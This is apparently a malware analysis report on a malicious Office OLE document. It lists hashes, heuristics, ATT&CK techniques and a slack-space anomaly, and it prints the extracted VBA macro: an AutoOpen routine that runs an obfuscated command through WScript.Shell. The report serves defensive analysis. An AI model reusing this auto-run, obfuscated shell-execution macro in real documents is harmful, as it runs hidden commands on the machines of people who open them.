Office (OLE) malware analysis — malicious · 49b5ecf15c5f78fb

MALICIOUS

Office (OLE)

79.3 KB First seen: 2019-05-16

MD5: faf4ce1f9ca1dcedf83827d4e6103555 SHA-1: bc403fac76fcae182019d7ce5c0227e366a2e88e SHA-256: 49b5ecf15c5f78fb6c5493178f4bb3ca796a5e0ae66e5a0bb727e387c5817bcd

208 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains VBA macros with an AutoOpen subroutine that utilizes WScript.Shell to execute a command. The script attempts to obfuscate the command string by concatenating character codes, but the primary intent is to run an external process. This behavior is characteristic of macro-based malware designed to download and execute further stages.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

   Error 19554 * sjqITJ / 83673 * GLudVL
RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
   Error nwMhrw / EjdtzF

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

   Error 19554 * sjqITJ / 83673 * GLudVL
RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
   Error nwMhrw / EjdtzF

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "DUcAahTi"
Sub AutoOpen()
On Error Resume Next
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 81,159 bytes but its declared streams total only 36,441 bytes — 44,718 bytes (55%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 394 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	394 bytes
SHA-256: `09061e3122f7188a2d76575beec504213d48d12719af91b9675e3f5d46560f42`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DUcAahTi" Sub AutoOpen() On Error Resume Next Error 19554 * sjqITJ / 83673 * GLudVL RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213) Error nwMhrw / EjdtzF Error EYHSt * oNCwD / 50375 * TGfFQW End Sub

SHA-256: 09061e3122f7188a2d76575beec504213d48d12719af91b9675e3f5d46560f42

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DUcAahTi"
Sub AutoOpen()
On Error Resume Next
   Error 19554 * sjqITJ / 83673 * GLudVL
RiQuNLjv = CreateObject("WScript.Shell").Run(ChrW(8 + 6 + 7 + 4 + 42) + hGDbhNn + pMKwBqF + YJzAntBCW + hqNLz + ZNJizjw + MFUYYiizJu + ZOkwWAJDMS + NwRTDHXHOTOZj + BUCGBLVCnOUii, 122235213 - 122235213)
   Error nwMhrw / EjdtzF
   Error EYHSt * oNCwD / 50375 * TGfFQW
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.